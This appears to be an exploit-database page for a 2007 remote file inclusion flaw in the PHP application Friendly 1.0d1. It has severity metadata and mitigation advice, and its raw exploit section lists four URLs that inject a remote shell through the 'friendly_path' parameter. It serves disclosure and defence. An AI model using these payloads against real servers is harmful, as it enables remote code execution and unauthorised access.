header-logo
Suggest Exploit
vendor:
Friendly
by:
GolD_M = [Mahmood_ali] (no additional information provided)
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Friendly
Affected Version From: Friendly 1.0d1
Affected Version To: Friendly 1.0d1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Friendly 1.0d1 (friendly_path) Remote File Inclusion Vulnerabilities

The vulnerability allows an attacker to include a remote file by manipulating the 'friendly_path' parameter in the specified URLs. This can lead to remote code execution and unauthorized access to the server.

Mitigation:

The vendor should release a patch or update to fix the vulnerability. In the meantime, users are advised to restrict access to the affected URLs and implement input validation to prevent malicious file inclusion.
Source

Exploit-DB raw data:

# Friendly 1.0d1 (friendly_path)Remote File Inclusion Vulnerabilities
# D.Script: http://friendlyphp.org/downloads/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/_friendly/core/data/_load.php?friendly_path=shell
# Exploit:[Path]/_friendly/core/data/yaml.inc.php?friendly_path=shell
# Exploit:[Path]/_friendly/core/display/_load.php?friendly_path=shell
# Exploit:[Path]/_friendly/core/support/_load.php?friendly_path=shell
# Greetz To: Tryag-Team ....##

# milw0rm.com [2007-05-06]

Navigation

Suggest Exploit

Services By CQR